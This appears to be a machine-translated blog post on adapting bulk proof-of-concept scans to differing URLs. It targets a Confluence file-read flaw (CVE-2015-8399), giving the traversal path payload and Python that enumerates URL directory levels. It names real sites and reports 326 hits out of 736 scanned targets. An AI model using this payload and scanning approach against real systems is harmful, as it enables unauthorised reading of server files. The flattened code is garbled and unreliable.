Solve the problem of the POC script adaptive to multiple URLs

In the process of bulk POC, the URL states we collect are often different.
So we need to handle the URL uniformly so that the POC script can accurately validate each URL

We provide examples of actual vulnerabilities and give my bulk POC solution.

Vulnerability example

Atlassian confluence 5.8.17 A vulnerability existed in previous versions of the vulnerability spaces/viewdefaultdecorator.action and the admin/viewdefaultdecorator.action file did not have sufficient filtering ‘decoratorName‘ parameters. The vulnerability could be exploited by a remote attacker to read a configuration file.

Detailed reference:
http://zone.wooyun.org/content/27104
http://www.cnnvd.org.cn/vulnerability/show/cv_id/2016010311
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8399

The file traversal exploits are simple and can be used to list the current directory files as long as you access this location:
/spaces/viewdefaultdecorator.action?decoratorName=.

Now we have the following types of URLs in the search engine:

1 wiki.kuali.org2 http://dev.aixuedai.com:8090/3 https://wiki.netdef.org/display/osr/Home4 http://cwiki.apache.org/confluence/display/Hive/HCatalog/?id=2#

Now we consider how the POC can be written to accommodate these different forms of URLs

Solution Solutions

The first two of our unified URL format, so that the POC script can be opened correctly. And the third fourth situation, we collected the URL has a multi-level directory, and even the post parameters, we start from which layer to add payload to do the verification?

One way I'm going to do this is to sort out the format first, then take out the useful parts of the URL to synthesize the new URL, and then combine the traversal for multiple directories.

Operation Process

1. Original URL:
   http://cwiki.apache.org:8090/confluence/display/Hive/HCatalog/?id=2#
2. Extracted URLs:
   Protocol: http
   Domain Name: cwiki.apache.org
   Port: 8090
   Path: /confluence/display/Hive/HCatalog/
   Params: id=2
   Fragments:#
3. To decompose Path
   Path_list = [' Confluence ', ' Display ', ' Hive ', ' Hcatalog ']
4. Remove the useless parts, enumerate the path fields, and combine them into a new URL
   Poc_list = [
   ' http://cwiki.apache.org:8090 ',
   ' Http://cwiki.apache.org:8090/confluence ',
   ' Http://cwiki.apache.org:8090/confluence/display ',
   ' Http://cwiki.apache.org:8090/confluence/display/Hive ',
   ' Http://cwiki.apache.org:8090/confluence/display/Hive/HCatalog '
   ]
5. Add validation to the end of each URL string in 4 /spaces/viewdefaultdecorator.action?decoratorName=.

Batch Practice

Using the Python built-in module urlparse to format the URL, I added the following two functions to meet our needs.

 def get_domain(URL):    "" " added by CDXY 8 sun,2016 use:get_domain (' http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2# ') Return: ' H Ttp://cdxy.me:80 ' "" "p = urlparse (URL)returnUrlunsplit ([P.scheme, P.netloc,"',"',"']) def iterate_path(ori_str):    "" " added by CDXY 8 sun,2016 use:iterate_path_to_list (' http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2# ') Ret urn: [' http://cdxy.me:80/path1/path2/index.jsp?id=2# ', ' http://cdxy.me:80/' ' http://cdxy.me:80/cdsa ', ' http ://cdxy.me:80/cdsa/cda ', ' http://cdxy.me:80/cdsa/cda/aaa.jsp '] "" "Parser = Urlparse (ori_str) _ans_list = [Ori_str] _ans_list.append (Get_domain (ori_str)) _path_list = PARSER.PATH.R Eplace ('//','/'). Strip ('/'). Split ('/') s ="'     foreachinch_path_list:s + ='/'+ Each _ans_list.append (Urljoin (ORI_STR, s))return_ans_list

The POC script for this vulnerability is now integrated into my concurrency framework:

The scan result 326 / 736 hit rate is still quite high:

Report

• Concurrency Framework Https://github.com/Xyntax/POC-T
• Modified urlparser.py https://github.com/Xyntax/POC-T/blob/master/lib/utils/urlparser.py
• This vulnerability authentication Module https://github.com/Xyntax/POC-T/blob/master/module/confluence-file-read.py

Solve the problem of the POC script adaptive to multiple URLs